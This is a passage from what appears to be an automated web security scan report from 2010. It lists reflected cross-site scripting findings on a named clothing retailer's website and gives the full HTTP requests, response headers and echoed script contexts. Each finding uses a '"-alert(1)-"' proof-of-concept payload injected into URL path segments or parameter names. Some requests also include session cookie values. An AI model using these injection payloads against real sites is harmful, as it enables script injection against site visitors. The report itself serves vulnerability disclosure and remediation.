<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/mencd734"-alert(1)-"5870bc30553/shorts/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a978"-alert(1)-"606c1d68e0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/shorts1a978"-alert(1)-"606c1d68e0f/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=m979oncrcran81j6ldggdbvt02; expires=Tue, 09-Nov-2010 17:13:45 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/shorts1a978"-alert(1)-"606c1d68e0f/"); //]]> ...[SNIP]...
1.134. http://www.fredperry.com/limited-edition/men/shorts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/shorts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a1ac"-alert(1)-"94d6c0bb51d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/shorts/?2a1ac"-alert(1)-"94d6c0bb51d=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/shorts/?2a1ac"-alert(1)-"94d6c0bb51d=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822b3"-alert(1)-"b20e2f3dc25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition822b3"-alert(1)-"b20e2f3dc25/men/trousers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:12:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=t043khjde91qdmtguotmk6cul5; expires=Tue, 09-Nov-2010 17:12:23 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition822b3"-alert(1)-"b20e2f3dc25/men/trousers/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 341fe"-alert(1)-"31db44bf19f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men341fe"-alert(1)-"31db44bf19f/trousers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:12:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ea8jb9ed3q44qqk7655vn8uep3; expires=Tue, 09-Nov-2010 17:12:42 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men341fe"-alert(1)-"31db44bf19f/trousers/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3995f"-alert(1)-"a3952493b7c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/trousers3995f"-alert(1)-"a3952493b7c/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=p1bt0tf99spp6ed3hjnti3frl5; expires=Tue, 09-Nov-2010 17:13:05 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/trousers3995f"-alert(1)-"a3952493b7c/"); //]]> ...[SNIP]...
1.138. http://www.fredperry.com/limited-edition/men/trousers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/trousers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b150e"-alert(1)-"33d8408daf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/trousers/?b150e"-alert(1)-"33d8408daf3=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/trousers/?b150e"-alert(1)-"33d8408daf3=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c21cc"-alert(1)-"0ce157bdad7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-editionc21cc"-alert(1)-"0ce157bdad7/men/woven-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=jkc6rurokln17h26i69cb11qs6; expires=Tue, 09-Nov-2010 17:14:37 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-editionc21cc"-alert(1)-"0ce157bdad7/men/woven-shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49a6f"-alert(1)-"250afec6fce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men49a6f"-alert(1)-"250afec6fce/woven-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=facdjjolf3cmv5erkbtf895pi0; expires=Tue, 09-Nov-2010 17:14:58 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men49a6f"-alert(1)-"250afec6fce/woven-shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7c44"-alert(1)-"e4a400a0921 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/woven-shirtsa7c44"-alert(1)-"e4a400a0921/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=53vnpl842au915dr6l8pe40j37; expires=Tue, 09-Nov-2010 17:15:19 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/woven-shirtsa7c44"-alert(1)-"e4a400a0921/"); //]]> ...[SNIP]...
1.142. http://www.fredperry.com/limited-edition/men/woven-shirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/woven-shirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52818"-alert(1)-"864ea334664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/woven-shirts/?52818"-alert(1)-"864ea334664=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/woven-shirts/?52818"-alert(1)-"864ea334664=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f13"-alert(1)-"e0e423b9710 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-editionc5f13"-alert(1)-"e0e423b9710/women/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:12:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=oc7q2ucdi300denj3g419cgq85; expires=Tue, 09-Nov-2010 17:12:42 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29357
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-editionc5f13"-alert(1)-"e0e423b9710/women/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e892d"-alert(1)-"71a594f2ca6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/womene892d"-alert(1)-"71a594f2ca6/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=0j2alplcamddjnc4l2grtunqm1; expires=Tue, 09-Nov-2010 17:13:17 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29357
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/womene892d"-alert(1)-"71a594f2ca6/"); //]]> ...[SNIP]...
1.145. http://www.fredperry.com/limited-edition/women/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58d36"-alert(1)-"7c51ba12963 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/?58d36"-alert(1)-"7c51ba12963=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d54c5"-alert(1)-"13b1baf7e25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-editiond54c5"-alert(1)-"13b1baf7e25/women/accessories/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=0tposdlgclqd1h58brr6uk20h6; expires=Tue, 09-Nov-2010 17:20:10 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-editiond54c5"-alert(1)-"13b1baf7e25/women/accessories/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58f2e"-alert(1)-"049337dcf29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women58f2e"-alert(1)-"049337dcf29/accessories/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=73thgc0j921t9c0heu3odub2g1; expires=Tue, 09-Nov-2010 17:20:30 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women58f2e"-alert(1)-"049337dcf29/accessories/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6a85"-alert(1)-"300d6ce8743 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/accessoriese6a85"-alert(1)-"300d6ce8743/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
